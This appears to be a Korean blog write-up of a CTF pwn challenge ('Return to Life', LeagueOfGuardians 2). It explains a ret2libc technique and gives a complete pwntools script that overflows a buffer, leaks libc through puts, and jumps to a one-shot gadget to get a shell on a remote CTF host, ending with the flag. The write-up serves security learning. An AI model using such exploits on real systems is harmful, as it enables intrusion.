[LeagueOfGuardians 2] Return to Life
64bit, No canary, NX enabled
puts로 libc_base leak 후 one_shot gadget으로 돌리면 됩니다. leak 하고 나면 chaning이 끝나니 main으로 다시 돌아와서 exploit 해야합니다. puts의 인자가 하나이기 때문에 pop rdi; ret도 구해줍니다.
puts_offset
main
Oneshot gadget offset
pop rdi; ret;
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 |
from pwn import *
s = remote("13.209.121.90", 13787) #s = process('./return') e = ELF('./return')
puts_plt = e.plt['puts'] puts_got = e.got['puts'] main = 0x400683 offset_puts = 0x6f690 one_shot = 0xf02a4 prdir = 0x00400783
#############Leak#############
payload = 'A'*40
payload += p64(prdir) payload += p64(puts_got) payload += p64(puts_plt)
payload += p64(main)
s.sendlineafter("function??\n", payload)
s.recvuntil("function!!\n") libc_base = u64(s.recv(6)+'\x00\x00') - offset_puts log.info(hex(libc_base))
###########Exploit############
payload2 = 'A'*40 payload2 += p64(libc_base + one_shot)
s.sendlineafter("function??\n", payload2) s.interactive()
|
FLAG : Charac73r_15_a_hab17_L0ng_c0n71nu3d
'System&Write up > CTF' 카테고리의 다른 글
| [LeagueOfGuardians 2] register_you (0) | 2018.07.24 |
|---|---|
| [LeagueOfGuardians 2] FOR (0) | 2018.07.24 |
| [Codegate 2016] watermelon (0) | 2018.06.03 |
| [Codegate 2018] catshop (0) | 2018.04.08 |
| [Codegate 2018] DaysNote (0) | 2018.04.08 |